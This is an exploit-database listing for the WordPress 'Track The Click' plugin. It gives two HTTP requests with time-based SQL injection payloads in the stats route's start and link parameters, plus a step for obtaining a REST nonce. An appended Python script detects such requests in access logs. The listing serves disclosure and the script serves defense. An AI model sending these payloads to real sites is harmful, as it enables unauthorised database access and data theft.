## https://sploitus.com/exploit?id=WPEX-ID:45194442-6EEA-4E07-85A5-4A1E2FDE3523
```http
GET /wp-json/track-the-click/v1/stats?start=20230825')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
```

```http
GET /wp-json/track-the-click/v1/stats?link=1')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1start=20230825&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
```

Get a valid nonce from "/wp-admin/admin-ajax.php?action=rest-nonce"
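
For defenders, a detection sketch added here (not part of the original listing or the plugin's code): it scans access-log lines for requests to the stats route whose `start`, `end` or `link` values are not plain digits. The expected value shapes are an assumption inferred from the untampered values in the requests above, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/wp-json/track-the-click/v1/stats"
# Assumed benign shapes, inferred from the untampered values shown above.
EXPECTED = {
    "start": re.compile(r"\d{8}"),
    "end": re.compile(r"\d{8}"),
    "link": re.compile(r"\d+"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return the names of stats parameters whose decoded value is off-shape."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/") != ROUTE:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = []
    for name, pattern in EXPECTED.items():
        for value in query.get(name, []):
            if not pattern.fullmatch(value):
                bad.append(name)
    return bad

def scan(log_lines):
    """Return (line_number, [parameter names]) for each flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_params(match.group(1))
            if bad:
                hits.append((number, bad))
    return hits

def _line(target):  # constructed combined-log-format line
    return f'203.0.113.9 - - [01/Sep/2023:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

INJ = "')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1"
SAMPLE_LOG = [
    _line(ROUTE + "?start=20230825&end=20230901&group=link&group_time=day"),
    _line(ROUTE + "?start=20230825" + INJ + "&end=20230901&group=link"),
    _line(ROUTE + "?link=1" + INJ + "&end=20230901&group=link"),
    _line("/wp-json/wp/v2/posts?search=20230825'"),
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: off-shape value in {', '.join(names)}")
```

Requests that reach the same route through WordPress's `?rest_route=` query form are not covered by the path check and would need a second rule.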